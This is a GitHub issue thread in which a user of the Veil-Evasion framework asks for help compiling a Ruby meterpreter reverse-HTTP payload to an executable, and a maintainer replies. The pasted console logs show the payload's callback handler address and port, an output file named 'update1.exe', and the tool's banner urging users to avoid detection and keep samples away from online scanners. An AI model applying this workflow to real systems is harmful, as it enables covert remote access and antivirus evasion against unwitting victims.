### ISSUE TITLE
Hello 

### ISSUE THREAD

**Issue by ext1** [Veil-Framework/Veil-Evasion#135]
Have  problems whith generate to exe file, I RUN compile_to_exe=Y but the payload is payload.rb
Veil-Evasion | [Version]: 2.19.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
 [*] Executable written to: /root/veil-output/compiled/payload.exe
 Language:		ruby
 Payload:		ruby/meterpreter/rev_http
 Required Options:      LHOST=192.168.64.129  LPORT=4444  compile_to_exe=Y
 Payload File:		/root/veil-output/source/payload.rb
 Handler File:		/root/veil-output/handlers/payload_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)

 [>] press any key to return to the main menu:

**Comment by ChrisTruncer** [comment]
Can you please pastebin the full console output, and did you checked the compiled directory?

**Comment by ext1** [comment]
[>] Please enter a command: 36

=========================================================================
 Veil-Evasion | [Version]: 2.19.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload: ruby/meterpreter/rev_http loaded


 Required Options:

 Name			Current Value	Description
 ----			-------------	-----------
 LHOST           	192.168.64.129	IP of the metasploit handler
 LPORT           	4444    	Port of the metasploit handler
 compile_to_exe  	Y       	Compile to an executable

 Available commands:

	set         	set a specific option value
	info        	show information about the payload
	generate    	generate payload
	back        	go to the main menu
	exit        	exit Veil

 [>] Please enter a command: generate 

=========================================================================
 Veil-Evasion | [Version]: 2.19.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files: update1
=== Loading script to check dependencies
=== Detected gem win32-api-1.4.8-x86-mingw32 (loaded, files)
=== WARNING: C:/Ruby187/lib/ruby/gems/1.8/gems/win32-api-1.4.8-x86-mingw32/lib was not found
=== 	4 files, 88145 bytes
=== Building /root/veil-output/compiled/update1.exe
=== Adding user-supplied source files
=== Adding ruby executable rubyw.exe
=== Adding detected DLL C:/Ruby187/bin/zlib1.dll
=== Adding library files
=== Compressing 1934188 bytes
=== Finished building /root/veil-output/compiled/update1.exe (601934 bytes)




=========================================================================
 Veil-Evasion | [Version]: 2.19.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================


 [*] Executable written to: /root/veil-output/compiled/update1.exe

 Language:		ruby
 Payload:		ruby/meterpreter/rev_http
 Required Options:      LHOST=192.168.64.129  LPORT=4444  compile_to_exe=Y
 Payload File:		/root/veil-output/source/update1.rb
 Handler File:		/root/veil-output/handlers/update1_handler.rc


 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)

 [>] press any key to return to the main menu:
